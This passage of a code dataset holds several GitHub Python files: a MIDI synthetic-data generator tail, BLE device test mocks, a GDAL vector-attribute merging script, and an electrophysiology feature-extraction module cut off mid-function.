np.clip(df[\"velocity\"] + velocity_change, 0, 127)\n\n # Write the modified DataFrame to a new CSV file\n csv_filename = os.path.splitext(os.path.basename(csv_file_path))[0]\n modified_csv_file_path = os.path.join(\n \"anomalous\",\n f\"{csv_filename}_modified-N{note_change}V{velocity_change}.csv\",\n )\n\n df.to_csv(modified_csv_file_path, index=False)\n\n\ndef generate_nonanomalous_data(csv_data_dir):\n # Walk through every file in the csv_data_dir directory\n for root, dirs, files in os.walk(csv_data_dir):\n for file in files:\n if file.endswith(\".csv\"):\n for _ in range(6):\n set_anomaly_column_none(os.path.join(root, file))\n\n\n# generate_anomalous_data(\"csvMidiData\", \"masterChanges.csv\")\n\n\n# generate_nonanomalous_data(\"csvMidiData\")\n\n# getMidiDF(\"36693.mid\")\n","repo_name":"dpshade22/AnomalyMidi","sub_path":"src/syntheticDataGenerator.py","file_name":"syntheticDataGenerator.py","file_ext":"py","file_size_in_byte":7699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14858842444","text":"class MockedBLEDevice:\n def __init__(self):\n self.name = \"Airthings Wave+\"\n self.rssi = -69\n self.metadata = {\n \"uuids\": [\n \"00001800-0000-1000-8000-00805f9b34fb\"\n \"00001801-0000-1000-8000-00805f9b34fb\"\n \"0000180a-0000-1000-8000-00805f9b34fb\"\n \"b42e1c08-ade7-11e4-89d3-123b93f75cba\"\n \"f000ffc0-0451-4000-b000-000000000000\"\n ],\n # Represents '2930618893', a valid serial for a model 2930 (Wave+)\n \"manufacturer_data\": {820: [13, 178, 173, 174, 9, 0]},\n }\n self.address = \"80:XO:XO:XO:EE:48\"\n\n\nclass MockedBleakClient(object):\n def __init__(self, addr):\n self.addr = addr\n self.is_connected = False\n\n async def read_gatt_char(self, _uuid):\n return bytearray(\n b\"\\x01A\\x00\\x00\\x88\\x00\\x8f\\x00\\x0f\\x08X\\xbf\\xb4\\x02r\\x00\\x00\\x00\\x1c\\x06\"\n )\n\n async def connect(self):\n self.is_connected = True\n return True\n\n async def disconnect(self):\n self.is_connected = False\n return True\n\n async def __aenter__(self):\n await self.connect()\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n await self.disconnect()\n return True\n\n\nclass MockedFailingBleakClient(MockedBleakClient):\n async def connect(self):\n self.is_connected = False\n return False\n","repo_name":"ztroop/wave-reader-utils","sub_path":"tests/mocks.py","file_name":"mocks.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"31"} +{"seq_id":"3818743588","text":"import os\nimport sys\nimport time\nimport logging\nimport numpy\nimport pickle\nfrom rtree import index\nimport shapely\nimport shapely.wkb\nimport shapely.speedups\n\nfrom osgeo import gdal, osr, ogr\n\nimport pygeoprocessing\nimport taskgraph\n\nlogging.basicConfig(\n level=logging.DEBUG,\n format=(\n '%(asctime)s (%(relativeCreated)d) %(levelname)s %(name)s'\n ' [%(funcName)s:%(lineno)d] %(message)s'),\n stream=sys.stdout)\nLOGGER = logging.getLogger(__name__)\n\n\ndef combine_vector_attributes(\n base_vector_path, combine_vector_path, attr_list):\n \"\"\"Add fields from ``combine_vector_path`` to ``base_vector_path``.\n\n Args:\n base_vector_path (string): path to a GDAL vector file. Used as the\n base for the output vector.\n combine_vector_path (string): path to a GDAL vector file. Used as the\n base for the output vector.\n attr_list (list): list of ``combine_vector_path`` attributes to add to\n ``base_vector_path``.\n\n Returns:\n None\n \"\"\"\n LOGGER.debug(\"Add attributes to vector\")\n base_vector_info = pygeoprocessing.get_vector_info(base_vector_path)\n\n base_vector = gdal.OpenEx(base_vector_path, gdal.GA_Update | gdal.OF_VECTOR)\n combine_vector = gdal.OpenEx(combine_vector_path, gdal.OF_VECTOR)\n\n layer = base_vector.GetLayer(0)\n layer_dfn = layer.GetLayerDefn()\n number_features = layer.GetFeatureCount()\n\n combine_layer = combine_vector.GetLayer(0)\n combine_layer_dfn = combine_layer.GetLayerDefn()\n\n LOGGER.info(f'Attrs to add: {attr_list}')\n field_names = [field.name for field in layer.schema]\n for field_key in attr_list:\n if field_key in field_names:\n continue\n target_field = ogr.FieldDefn(field_key, ogr.OFTReal)\n layer.CreateField(target_field)\n\n # Copy all of the features in layer to the new shapefile\n last_time = time.time()\n layer.StartTransaction()\n for feature_index, feature in enumerate(layer):\n last_time = pygeoprocessing._invoke_timed_callback(\n last_time, lambda: LOGGER.info(\n f'{(feature_index / number_features):.2f} processed'), 30.0)\n\n fid = feature.GetFID()\n feat_name = feature.GetFieldAsString('GID_1')\n\n # for RCP, not guaranteed we have the same FIDs / feature count\n # because I didn't use the masked antartica shape file when gathering\n # stats\n feature_match = False\n for combine_feature in combine_layer:\n comb_name = combine_feature.GetFieldAsString('GID_1')\n if comb_name == feat_name:\n feature_match = True\n break\n if not feature_match:\n continue\n\n for field_name in attr_list:\n combine_value = combine_feature.GetFieldAsDouble(field_name)\n fld_idx = feature.GetFieldIndex(field_name)\n if combine_value is None:\n combine_value = 0.0\n\n feature.SetField(fld_idx, float(combine_value))\n\n layer.SetFeature(feature)\n combine_layer.ResetReading()\n feature = None\n combine_feature = None\n\n layer.CommitTransaction()\n\n layer = None\n vector = None\n combine_layer = None\n combine_vector = None\n\ndef copy_vector(base_vector_path, target_vector_path):\n \"\"\" \"\"\"\n LOGGER.debug(\"Copying vector\")\n base_vector = gdal.OpenEx(base_vector_path, gdal.OF_VECTOR)\n\n layer = base_vector.GetLayer(0)\n layer_dfn = layer.GetLayerDefn()\n\n # if this file already exists, then remove it\n if os.path.isfile(target_vector_path):\n os.remove(target_vector_path)\n\n # create a new shapefile from the orginal_datasource\n target_driver = ogr.GetDriverByName('GPKG')\n target_vector = target_driver.CreateDataSource(target_vector_path)\n target_vector.CopyLayer(layer, layer_dfn.GetName())\n\n layer = None\n base_vector = None\n target_vector = None\n\n\nif __name__ == \"__main__\":\n\n LOGGER.debug(\"Starting Processing\")\n\n output_root_dir = os.path.join(\n 'C:', os.sep, 'Users', 'ddenu', 'Workspace', 'NatCap', 'Repositories',\n 'global-web-viewer', 'processed-data')\n\n gadm0_root_dir = os.path.join(\n output_root_dir, 'gadm_stats_vectors', 'gadm36_0_clipped_stats')\n gadm1_root_dir = os.path.join(\n output_root_dir, 'gadm_stats_vectors', 'gadm36_1_clipped_stats')\n hybas_root_dir = os.path.join(output_root_dir, 'hybas_stats_vectors')\n\n #combine_vector_dir = os.path.join(gadm0_root_dir, 'combined_dir')\n combine_vector_dir = os.path.join(gadm1_root_dir, 'combined_dir')\n #combine_vector_dir = os.path.join(hybas_root_dir, 'combined_dir')\n if not os.path.exists(combine_vector_dir):\n os.mkdir(combine_vector_dir)\n\n ### TaskGraph Set Up\n #taskgraph_working_dir = os.path.join(\n # combine_vector_dir, '_stats_taskgraph_working_dir')\n\n #n_workers = -1\n #task_graph = taskgraph.TaskGraph(taskgraph_working_dir, n_workers)\n ###\n\n #base_vector_path = os.path.join(\n # gadm0_root_dir, 'gadm36_0_clipped_sed_stats.gpkg')\n combined_out_path = os.path.join(\n combine_vector_dir, 'gadm1_all_stats.gpkg')\n #base_vector_path = os.path.join(\n # gadm1_root_dir, 'gadm36_1_clipped_sed_perc.gpkg')\n #combined_out_path = os.path.join(\n # combine_vector_dir, 'gadm1_all_stats.gpkg')\n #base_vector_path = os.path.join(\n # hybas_root_dir, 'merged_sed_vectors', 'hybas_all_sed.shp')\n #combined_out_path = os.path.join(\n # combine_vector_dir, 'hybas_all_service_stats.gpkg')\n\n #copy_vector(base_vector_path, combined_out_path)\n\n # created the base with sed, so not needed again\n #service_id_list = ['nit', 'acc', 'crop']\n #service_id_list = ['nit', 'acc']\n service_id_list = ['rcp']\n\n for service_id in service_id_list:\n #service_vector_path = os.path.join(\n # gadm0_root_dir, f'gadm36_0_clipped_{service_id}_stats.gpkg')\n #service_vector_path = os.path.join(\n # gadm1_root_dir, f'gadm36_1_clipped_{service_id}_perc.gpkg')\n #service_vector_path = os.path.join(\n # hybas_root_dir, f'merged_{service_id}_vectors', \n # f'hybas_all_{service_id}.shp')\n #attr_list = [f'{service_id}_mean', f'{service_id}_pct']\n\n # Add RCP attributes\n #service_vector_path = os.path.join(\n # output_root_dir, 'coastal_protection_stats_vectors',\n # 'results_gadm36_1', 'gadm36_1_rcp_stats.gpkg')\n service_vector_path = os.path.join(\n output_root_dir, 'coastal_protection_stats_vectors',\n 'gadm36_1_rcp_stats.gpkg')\n attr_list = [\n f'{service_id}-mean', f'{service_id}-count', f'{service_id}-sum']\n\n combine_vector_attributes(\n combined_out_path, service_vector_path, attr_list)\n\n","repo_name":"natcap/global-web-viewer","sub_path":"data/combine-vector-attributes.py","file_name":"combine-vector-attributes.py","file_ext":"py","file_size_in_byte":6825,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"31"} +{"seq_id":"33114712972","text":"\"\"\"\n================================================================================\n\tElectrophysiology Feature Extraction Utility Functions\n================================================================================\n\n\tAuthor: Eric Johnson\n\tDate Created: Thursday, March 7, 2019\n\tEmail: ericjohnson1.2015@u.northwestern.edu\n\n================================================================================\n================================================================================\n\n\tThis file contains a module of functions that will be useful in the \n\textraction of various features from electrophysiology data.\n\n\tIn particular, this function will contain methods for protocol detection and\n\tfor the creation of protocol dictionaries.\n\n================================================================================\n================================================================================\n\"\"\"\nfrom copy import deepcopy\nimport numpy as np\nfrom scipy.optimize import curve_fit\nimport scipy.signal as sig\n\nimport Objectives.Electrophysiology.ephys_objs as epo\n\nimport Utility.ABF_util as abf\nimport Utility.utility as utl\n\n################################################################################\n##\tSet Protocol ID Numbers\n################################################################################\nif True:\n\tEPHYS_PROT_REST\t\t\t\t= 0\n\tEPHYS_PROT_DEPOLSTEP\t\t= 1\n\tEPHYS_PROT_HYPERPOLSTEP\t\t= 2\n\tEPHYS_PROT_DEPOLSTEPS\t\t= 3\n\tEPHYS_PROT_HYPERPOLSTEPS\t= 4\n\tEPHYS_PROT_CONSTHOLD\t\t= 5\n\n\n################################################################################\n################################################################################\n##\n##\t\tElectrophysiology Protocol Methods\n##\n################################################################################\n################################################################################\n\n################################################################################\n## Get Experimental Protocol\n################################################################################\ndef getExpProtocol(hdr, useList=True):\n\t\"\"\"getExpProtocol(hdr, uselist=True)\n\n\tThis function will attemp to automatically detect the type of protocol that\n\twas implemented in a given data recording by parsing the header of the abf\n\tfile.\n\n\tAt the moment, we can reliably detect 6 different protocols:\n\n\tEPHYS_PROT_REST\t\t\t\t= 0\n\t\tThis is detected by noting that the entire waveform is 0\n\n\tEPHYS_PROT_DEPOLSTEP\t\t= 1\n\n\tEPHYS_PROT_HYPERPOLSTEP\t\t= 2\n\n\tEPHYS_PROT_DEPOLSTEPS\t\t= 3\n\n\tEPHYS_PROT_HYPERPOLSTEPS\t= 4\n\n\tEPHYS_PROT_CONSTHOLD\t\t= 5\n\t\tThis is detected by noting that the entire waveform is being held at one\n\t\tvalue.\n\n\tTO DO:\n\t======\n\t - Implement use of useList\n\t - Allow for other channels to be used, not just mV channel.\n\t - Allow for ramped epochs?\n\n\tInputs:\n\t=======\n\thdr \t\t(dict)\t\tHeader structure as extracted from an abf file.\n\t\t\t\t\t\t\t(Use abf.ABF_read(abf file))\n\n\tuseList \t(bool)\t\t(Optional, not implemented) Eventually we would like\n\t\t\t\t\t\t\tto have an annotated database of the data that would\n\t\t\t\t\t\t\tbe cross-referenced to indicate the type of\n\t\t\t\t\t\t\tprotocol, for now we just try to autodetect.\n\n\tOutputs:\n\t========\n\tprotNo \t\t(int)\t\tNumber indicating which protocol has been detected.\n\t\t\t\t\t\t\t-1 indicates that an unknown protocol has been\n\t\t\t\t\t\t\tdetected.\n\t\"\"\"\n\n\t## Check that our default channel has mV units\n\tif (hdr['recChUnits'][hdr['nADCSamplingSeq'][0]] != 'mV'):\n\t\treturn -1\n\n\t## Check that the epoch types are either disabled or steps\n\t## (Ramps are not allowed at this time)\n\tif np.any(hdr['nEpochType'] > 1):\n\t\treturn -1\n\n\t## Get the indices of the relevant epochs\n\tepochIdx = getEpochIdx(hdr)\n\n\t## Get the applied waveform for this observation\n\twaveform = abf.GetWaveform(hdr, hdr['lActualEpisodes'])\n\n\t## If the waveform is all 0, then assume the protocol is rest\n\tif np.all(waveform == 0):\n\t\treturn EPHYS_PROT_REST\n\n\t## If the waveform has one value and there is only one epoch (after \n\t## holding), then assume the protocol is a constant hold.\n\tif np.sum(hdr['nEpochType'][0] == 1) == 1:\n\t\tif len(np.unique(waveform)) == 1:\n\t\t\treturn EPHYS_PROT_CONSTHOLD\n\n\t## If the waveform has two values, and there are more than 3 epochs (after\n\t## holding), then assume that the protocol is a (set of) depol or hyperpol\n\t## step(s).\n\tholdCurr = abf.GetHoldingLevel(hdr, hdr['nActiveDACChannel'], 1)\n\tif np.sum(hdr['nEpochType'][0] == 1) > 2:\n\t\t## Check the unique epoch current levels\n\t\tepochLevs = hdr['fEpochInitLevel'][0][hdr['nEpochType'][0].nonzero()]\n\t\tepochLevs = np.unique(epochLevs)\n\t\t## If there are two unique levels...\n\t\tif len(epochLevs) == 2:\n\t\t\t## But they are both different from the holduing current, breal\n\t\t\tif np.sum(epochLevs != holdCurr) > 1:\n\t\t\t\treturn -1\n\n\t\t\t## Get non-holding current level\n\t\t\tnonZeroLev = epochLevs[(epochLevs != holdCurr).nonzero()]\n\n\t\t\t## If it's positive, it's a depol step(s)\n\t\t\tif nonZeroLev > holdCurr:\n\t\t\t\tif hdr['lActualEpisodes'] > 1:\n\t\t\t\t\treturn EPHYS_PROT_DEPOLSTEPS\n\t\t\t\telse:\n\t\t\t\t\treturn EPHYS_PROT_DEPOLSTEP\n\n\t\t\t## If it's negative, it's a hyperpol step(s)\n\t\t\telse:\n\t\t\t\tif hdr['lActualEpisodes'] > 1:\n\t\t\t\t\treturn EPHYS_PROT_HYPERPOLSTEPS\n\t\t\t\telse:\n\t\t\t\t\treturn EPHYS_PROT_HYPERPOLSTEP\n\n\t\t## If there's only one voltage...\n\t\telif len(epochLevs) == 1:\n\t\t\t## Get any increments\n\t\t\tepochIncs = hdr['fEpochLevelInc'][0]\n\t\t\tepochIncs = np.unique(epochIncs[(hdr['nEpochType'][0]).nonzero()])\n\n\t\t\t## Check whether there's a single non-zero voltage increment\n\t\t\tif np.sum(epochIncs != 0) == 1:\n\n\t\t\t\t## Get the value of the increment\n\t\t\t\tnonZeroInc = epochIncs[(epochIncs).nonzero()]\n\n\t\t\t\t## If it's positive, it's a depol step(s)\n\t\t\t\tif nonZeroInc > 0:\n\t\t\t\t\tif hdr['lActualEpisodes'] > 1:\n\t\t\t\t\t\treturn EPHYS_PROT_DEPOLSTEPS\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn EPHYS_PROT_DEPOLSTEP\n\n\t\t\t\t## If it's negative, it's a hyperpol step(s)\n\t\t\t\telse:\n\t\t\t\t\tif hdr['lActualEpisodes'] > 1:\n\t\t\t\t\t\treturn EPHYS_PROT_HYPERPOLSTEPS\n\t\t\t\t\telse:\n\t\t\t\t\t\treturn EPHYS_PROT_HYPERPOLSTEP\n\n\t\t\telif len(epochIncs) == 1:\n\t\t\t\treturn EPHYS_PROT_CONSTHOLD\n\n\t## It its none of these return unknown\n\treturn -1\n\n\n################################################################################\n## Get Epoch Indices for the Relevant Channel\n################################################################################\ndef getEpochIdx(hdr):\n\t\"\"\"getEpochIdx(hdr)\n\n\tThis is a shortcut to get the epoch indices (in the waveform array) of the\n\tvoltage channel (which is usually what we want). This is basically a \n\twrapper for abf.GetEpochIdx, which outputs the epoch indices for all\n\tchannels.\n\t\"\"\"\n\n\treturn abf.GetEpochIdx(hdr)[hdr['nActiveDACChannel']]\n\n\n################################################################################\n################################################################################\n##\n##\t\tElectrophysiology Feature Extraction Methods\n##\n################################################################################\n################################################################################\n\n################################################################################\n## Get Electrophysiology Features\n################################################################################\ndef getEphysFeatures(dataDict, infoDict, verbose=None):\n\n\tif verbose is not None:\n\t\ttry:\n\t\t\tverbose = utl.force_pos_int(verbose,\n\t\t\t\tname='epu.getEphysFeatures.verbose', zero_ok=True)\n\t\texcept:\n\t\t\tverbose = 0\n\telse:\n\t\ttry:\n\t\t\tverbose = infoDict['objectives']['verbose']\n\t\texcept:\n\t\t\tverbose = 0\n\n\tif verbose:\n\t\tprint_str = \"\\nExtracting Electrophysiology Features from Data\\n\"\n\t\tprint(print_str + (len(print_str)+1)*\"=\")\n\n\tdataFeat = {}\n\n\tkeys = sorted(list(dataDict.keys()))\n\n\tfor key in keys:\n\t\tdata = dataDict[key]['data']\n\t\thdr = dataDict[key]['header']\n\n\t\tprotocol = getExpProtocol(hdr)\n\n\t\tif protocol == EPHYS_PROT_REST:\n\t\t\tdataFeat = getRestFeatures(data, hdr, infoDict, dataFeat, key=key,\n\t\t\t\tverbose=verbose)\n\n\t\telif protocol == EPHYS_PROT_DEPOLSTEP:\n\t\t\tdataFeat = getDepolFeatures(data, hdr, infoDict, dataFeat, key=key,\n\t\t\t\tverbose=verbose)\n\n\t\telif protocol == EPHYS_PROT_HYPERPOLSTEP:\n\t\t\tdataFeat = getHyperpolFeatures(data, hdr, infoDict, dataFeat,\n\t\t\t\tkey=key, verbose=verbose)\n\n\t\telif protocol == EPHYS_PROT_DEPOLSTEPS:\n\t\t\tdataFeat = getDepolStepsFeatures(data, hdr, infoDict, dataFeat,\n\t\t\t\tkey=key, verbose=verbose)\n\n\t\telif protocol == EPHYS_PROT_HYPERPOLSTEPS:\n\t\t\tdataFeat = getHyperpolStepsFeatures(data, hdr, infoDict, dataFeat,\n\t\t\t\tkey=key, verbose=verbose)\n\n\t\telif protocol == EPHYS_PROT_CONSTHOLD:\n\t\t\tdataFeat = getConstHoldFeatures(data, hdr, infoDict, dataFeat,\n\t\t\t\tkey=key, verbose=verbose)\n\n\t\telse:\n\t\t\tif verbose > 1:\n\t\t\t\tprint_str = f\"Unknown protocol = {protocol}, cannot extract \"\n\t\t\t\tprint(print_str + \"features!\")\n\t\t\tcontinue\n\n\treturn dataFeat\n\n\n################################################################################\n## Get Electrophysiology Features from Rest Protocol\n################################################################################\ndef getRestFeatures(data, hdr, infoDict, dataFeat, key=None, verbose=0):\n\n\tverbose = utl.force_pos_int(verbose, name='epu.getRestFeatures.verbose',\n\t\tzero_ok=True)\n\n\tif verbose > 1:\n\t\tprint(\"Getting features from REST PROTOCOL\")\n\n\tdata = data[:, 0].squeeze()\n\n\tspikeIdx, spikeVals = epo.getSpikeIdx(data, dt=infoDict['data']['dt'],\n\t\t**infoDict['objectives']['Spikes'])\n\n\tfor obj in infoDict['objectives']:\n\n\t\tsubInfo = infoDict['objectives'][obj]\n\n\t\t## For rest protocols, only want mean fit.\n\t\tsubInfo['fit'] = 'mean'\n\n\t\tif obj == 'ISI':\n\t\t\terr = epo.getISI(spikeIdx, dt=infoDict['data']['dt'],\n\t\t\t\t**subInfo)\n\n\t\t\tif verbose > 2:\n\t\t\t\tprint(f\"ISI = {err:.4g}ms (FR = {1/err:.4g}Hz)\")\n\n\t\telif obj == 'Amp':\n\t\t\terr = epo.getSpikeAmp(spikeIdx, spikeVals,\n\t\t\t\tdt=infoDict['data']['dt'], **subInfo)\n\n\t\t\tif verbose > 2:\n\t\t\t\tprint(f\"Amp = {err:.4g}mV\")\n\n\t\telif obj == 'PSD':\n\t\t\terr = epo.getPSD(data, spikeIdx,\n\t\t\t\tdt=infoDict['data']['dt'], **subInfo)\n\n\t\t\tif verbose > 2:\n\t\t\t\tprint(f\"PSD = {err:.4g}mV\")\n\n\t\telse:\n\t\t\tcontinue\n\n\t\ttry:\n\t\t\t_ = dataFeat[obj]\n\t\texcept KeyError:\n\t\t\tdataFeat[obj] = {}\n\n\t\ttry:\n\t\t\t_ = dataFeat[obj]['rest']\n\t\texcept KeyError:\n\t\t\tdataFeat[obj]['rest'] = {}\n\n\t\tif key is not None:\n\t\t\tkey = utl.force_pos_int(key, name='epu.getRestFeatures.key',\n\t\t\t\tzero_ok=True, verbose=verbose)\n\t\telse:\n\t\t\tkey = list(dataFeat[obj]['rest'].keys()).sort().pop() + 1\n\n\t\tdataFeat[obj]['rest'][key] = deepcopy(err)\n\n\treturn dataFeat.copy()\n\n\n################################################################################\n## Get Electrophysiology Features from Depolarization Step Protocol\n################################################################################\ndef getDepolFeatures(data, hdr, infoDict, dataFeat, key=None, verbose=0):\n\n\tverbose = utl.force_pos_int(verbose, name='epu.getDepolFeatures.verbose',\n\t\tzero_ok=True)\n\n\tif verbose > 1:\n\t\tprint(\"Getting features from DEPOL STEP PROTOCOL\")\n\n\tdt = deepcopy(infoDict['data']['dt'])\n\n\tdata = data[:, 0].squeeze()\n\n\tdpData, dpIdx, dpI = getDepolIdx(data, hdr, protocol=EPHYS_PROT_DEPOLSTEP)\n\n\ttGrid = abf.GetTimebase(hdr, 0)[dpIdx[0]:dpIdx[1]]*dt\n\n\tspikeIdx, spikeVals = epo.getSpikeIdx(dpData, dt=dt,\n\t\t**infoDict['objectives']['Spikes'])\n\n\tfor obj in infoDict['objectives']:\n\n\t\tsubInfo = infoDict['objectives'][obj]\n\n\t\tif obj == \"ISI\":\n\t\t\tif len(spikeIdx) == 0:\n\t\t\t\tprint(\"NO SPIKES\")\n\t\t\t\tif subInfo['depol'] in ['thirds']:\n\t\t\t\t\terr = [np.inf, np.inf]\n\t\t\t\telse:\n\t\t\t\t\terr = np.inf\n\n\t\t\telif subInfo['depol'] in ['thirds', 'lastthird']:\n\t\t\t\tbounds = np.linspace(0, len(tGrid), 4).astype(int)\n\n\t\t\t\terr = []\n\n\t\t\t\tfirst = spikeIdx[spikeIdx < bounds[1]]\n\t\t\t\terr.append(epo.getISI(first, dt=dt, **subInfo))\n\n\t\t\t\tlast = spikeIdx[spikeIdx >= bounds[2]]\n\t\t\t\terr.append(epo.getISI(last, dt=dt, **subInfo))\n\n\t\t\t\tif subInfo['depol'] == 'lastthird':\n\t\t\t\t\terr = err[-1]\n\n\t\t\t\t\tif verbose > 2:\n\t\t\t\t\t\tprint(f\"ISI = {err:.4g}ms (FR = {1/err:.4g}Hz)\")\n\n\t\t\t\telse:\n\t\t\t\t\tif verbose > 2:\n\t\t\t\t\t\tfor e in err:\n\t\t\t\t\t\t\tprint(f\"ISI = {e:.4g}ms (FR = {1/e:.4g}Hz)\")\n\n\t\t\telse:\n\t\t\t\terr = epo.getISI(spikeIdx, dt=dt, **subInfo)\n\n\t\telif obj == 'Amp':\n\t\t\tif len(spikeIdx) == 0:\n\t\t\t\terr = np.nan\n\n\t\t\telse:\n\t\t\t\terr = epo.getSpikeAmp(spikeIdx, spikeVals, **subInfo)\n\n\t\t\t\tif not isinstance(err, float):\n\t\t\t\t\terr = err[1]\n\n\t\t\t\tif verbose > 2:\n\t\t\t\t\tprint(f\"Amp = {err:.4g}mV\")\n\n\t\telif obj == 'PSD':\n\t\t\terr = epo.getPSD(dpData, spikeIdx, dt=dt, **subInfo)\n\n\t\t\tif not isinstance(err, float):\n\t\t\t\terr = err[1]\n\n\t\t\tif verbose > 2:\n\t\t\t\tprint(f\"PSD = {err:.4g}mV\")\n\n\t\telse:\n\t\t\tcontinue\n\n\t\ttry:\n\t\t\t_ = dataFeat[obj]\n\t\texcept KeyError:\n\t\t\tdataFeat[obj] = {}\n\n\t\ttry:\n\t\t\t_ = dataFeat[obj]['depol']\n\t\texcept KeyError:\n\t\t\tdataFeat[obj]['depol'] = {}\n\n\t\tif key is not None:\n\t\t\tkey = utl.force_pos_int(key, name='epu.getDepolFeatures.key',\n\t\t\t\tzero_ok=True, verbose=verbose)\n\t\telse:\n\t\t\tkey = list(out[obj]['depol'].keys()).sort().pop() + 1\n\n\t\tdataFeat[obj]['depol'][key] = deepcopy(err)\n\n\treturn dataFeat.copy()\n\n\n################################################################################\n## Get Electrophysiology Features from Hyperpolarization Step Protocol\n################################################################################\ndef getHyperpolFeatures(data, hdr, infoDict, dataFeat, key=None, verbose=0):\n\n\tverbose = utl.force_pos_int(verbose, name='epu.getHyperpolFeatures.verbose',\n\t\tzero_ok=True)\n\n\tif verbose > 1:\n\t\tprint(\"Getting features from HYPERPOL STEP PROTOCOL\")\n\n\tdt = deepcopy(infoDict['data']['dt'])\n\n\tdata = data[:, 0].squeeze()\n\n\thpData, hpIdx, hpI = getHyperpolIdx(data, hdr,\n\t\tprotocol=EPHYS_PROT_HYPERPOLSTEP)\n\n\tspikeIdx, spikeVals = epo.getSpikeIdx(hpData, dt=dt,\n\t\t**infoDict['objectives']['Spikes'])\n\n\tfor obj in infoDict['objectives']:\n\n\t\tsubInfo = infoDict['objectives'][obj]\n\n\t\tif obj == 'PSD':\n\t\t\terr = epo.getPSD(data, spikeIdx, dt=dt, **subInfo)\n\n\t\t\tif not isinstance(err, float):\n\t\t\t\terr = err[1]\n\n\t\t\tif verbose > 2:\n\t\t\t\tprint(f\"PSD = {err:.4g}mV\")\n\n\t\telse:\n\t\t\tcontinue\n\n\t\ttry:\n\t\t\t_ = dataFeat[obj]\n\t\texcept KeyError:\n\t\t\tdataFeat[obj] = {}\n\n\t\ttry:\n\t\t\t_ = dataFeat[obj]['hyperpol']\n\t\texcept KeyError:\n\t\t\tdataFeat[obj]['hyperpol'] = {}\n\n\t\tif key is not None:\n\t\t\tkey = utl.force_pos_int(key, name='epu.getHyperpolFeatures.key',\n\t\t\t\tzero_ok=True, verbose=verbose)\n\t\telse:\n\t\t\tkey = list(out[obj]['hyperpol'].keys()).sort().pop() + 1\n\n\t\tdataFeat[obj]['hyperpol'][key] = deepcopy(err)\n\n\treturn dataFeat.copy()\n\n\n################################################################################\n## Get Electrophysiology Features from Depolarization Steps Protocol\n################################################################################\ndef getDepolStepsFeatures(data, hdr, infoDict, dataFeat, key=None, verbose=0):\n\n\tverbose = utl.force_pos_int(verbose,\n\t\tname='epu.getDepolStepsFeatures.verbose', zero_ok=True)\n\n\tif verbose > 1:\n\t\tprint(\"Getting features from DEPOL STEPS PROTOCOL\")\n\n\tdt = deepcopy(infoDict['data']['dt'])\n\n\tdata = data[:, 0].squeeze()\n\n\tdpData, dpIdx, dpI = getDepolIdx(data, hdr, protocol=EPHYS_PROT_DEPOLSTEPS)\n\n\tif verbose > 2:\n\t\tprint(f\"There are {hdr['lActualEpisodes']} episodes!\")\n\n\tfor ii, dpD in enumerate(dpData.T):\n\n\t\tif verbose > 2:\n\t\t\tprint(f\"Extracting features from episode {ii}!\")\n\n\t\tspikeIdx, spikeVals = epo.getSpikeIdx(dpD, dt=dt,\n\t\t\t**infoDict['objectives']['Spikes'])\n\n\t\tfor obj in infoDict['objectives']:\n\n\t\t\tif verbose > 3:\n\t\t\t\tprint(f\"Considering objective {obj}\")\n\n\t\t\tsubInfo = infoDict['objectives'][obj]\n\n\t\t\tif obj == \"ISI\":\n\n\t\t\t\tif subInfo['depol'] in ['thirds', 'lastthird']:\n\t\t\t\t\tbounds = np.linspace(0, len(dpD), 4).astype(int)\n\n\t\t\t\t\terr = []\n\n\t\t\t\t\tif len(spikeIdx) > 0:\n\t\t\t\t\t\tfirst = spikeIdx[spikeIdx < bounds[1]]\n\t\t\t\t\telse:\n\t\t\t\t\t\tfirst = deepcopy(spikeIdx)\n\t\t\t\t\terr.append(epo.getISI(first, dt=dt, **subInfo))\n\n\t\t\t\t\tif len(spikeIdx) > 0:\n\t\t\t\t\t\tlast = spikeIdx[spikeIdx >= bounds[2]]\n\t\t\t\t\telse:\n\t\t\t\t\t\tlast = deepcopy(spikeIdx)\n\t\t\t\t\terr.append(epo.getISI(last, dt=dt, **subInfo))\n\n\t\t\t\t\tif subInfo['depol'] == 'lastthird':\n\t\t\t\t\t\terr = err[-1]\n\n\t\t\t\t\t\tif verbose > 2:\n\t\t\t\t\t\t\tprint(f\"ISI = {err:.4g}ms (FR = {1/err:.4g}Hz)\")\n\n\t\t\t\t\telse:\n\t\t\t\t\t\tif verbose > 2:\n\t\t\t\t\t\t\tfor e in err:\n\t\t\t\t\t\t\t\tprint(f\"ISI = {e:.4g}ms (FR = {1/e:.4g}Hz)\")\n\n\t\t\t\telse:\n\t\t\t\t\terr = epo.getISI(spikeIdx, dt=dt, **subInfo)\n\t\t\t\t\tif verbose > 2:\n\t\t\t\t\t\tprint(f\"ISI = {err:.4g}ms (FR = {1/err:.4g}Hz)\")\n\n\t\t\telif obj == 'Amp':\n\t\t\t\terr = epo.getSpikeAmp(spikeIdx, spikeVals, **subInfo)\n\n\t\t\t\tif not isinstance(err, float):\n\t\t\t\t\terr = err[1]\n\n\t\t\t\tif verbose > 2:\n\t\t\t\t\tprint(f\"Amp = {err:.4g}mV\")\n\n\t\t\telif obj == 'PSD':\n\t\t\t\terr = epo.getPSD(dpD, spikeIdx, dt=dt, **subInfo)\n\n\t\t\t\tif not isinstance(err, float):\n\t\t\t\t\terr = err[1]\n\n\t\t\t\tif verbose > 2:\n\t\t\t\t\tprint(f\"PSD = {err:.4g}mV\")\n\n\t\t\telse:\n\t\t\t\tcontinue\n\n\t\t\ttry:\n\t\t\t\t_ = dataFeat[obj]\n\t\t\texcept KeyError:\n\t\t\t\tdataFeat[obj] = {}\n\n\t\t\ttry:\n\t\t\t\t_ = dataFeat[obj]['depol']\n\t\t\texcept KeyError:\n\t\t\t\tdataFeat[obj]['depol'] = {}\n\n\t\t\tif key is not None:\n\t\t\t\tkey = utl.force_pos_int(key, name='epu.getDepolStepsFeats.key',\n\t\t\t\t\tzero_ok=True, verbose=verbose)\n\t\t\telse:\n\t\t\t\tkey = list(out[obj]['depol'].keys()).sort().pop() + 1\n\n\t\t\ttry:\n\t\t\t\t_ = dataFeat[obj]['depol'][key]\n\t\t\texcept KeyError:\n\t\t\t\tdataFeat[obj]['depol'][key] = 